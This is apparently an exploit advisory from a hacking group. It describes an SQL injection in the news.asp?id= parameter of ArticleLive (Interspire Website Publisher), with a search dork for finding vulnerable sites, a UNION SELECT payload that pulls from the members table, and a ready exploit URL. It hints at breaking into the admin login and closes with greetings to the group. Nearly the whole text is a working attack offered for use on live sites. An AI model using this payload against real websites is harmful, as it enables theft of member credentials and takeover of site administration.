32 lines
No EOL
872 B
Text
32 lines
No EOL
872 B
Text
*******************************************************************************
|
|
# Author : ra3ch
|
|
# Product : ArticleLive (Interspire Website Publisher)
|
|
# Price : N/A
|
|
# Site : www.dz4all.com/cc
|
|
# Dork : "Website by Spokane Web Communications"
|
|
# Risk : High
|
|
*
|
|
**Vulnerable script: news.asp?id= (SQL-injection)
|
|
*
|
|
---------------------------------------------------------
|
|
*
|
|
*
|
|
**http://server/[path]/news.asp?id= [SQL Inject]
|
|
*
|
|
*
|
|
**news.asp?id=34 union select 1,2,3,4,5,6,7,8,9,10,11 from members
|
|
*
|
|
*
|
|
**Exploit:
|
|
*
|
|
**http://server/news.asp?id=118%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20members
|
|
|
|
**Admin Login->
|
|
*
|
|
*
|
|
**http://server/[path]/Use your intelligence
|
|
*
|
|
*""""""""""""""""""""
|
|
** Greetz to : ALLAH
|
|
** All Members of http://www.DZ4All.cOm/Cc
|
|
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... |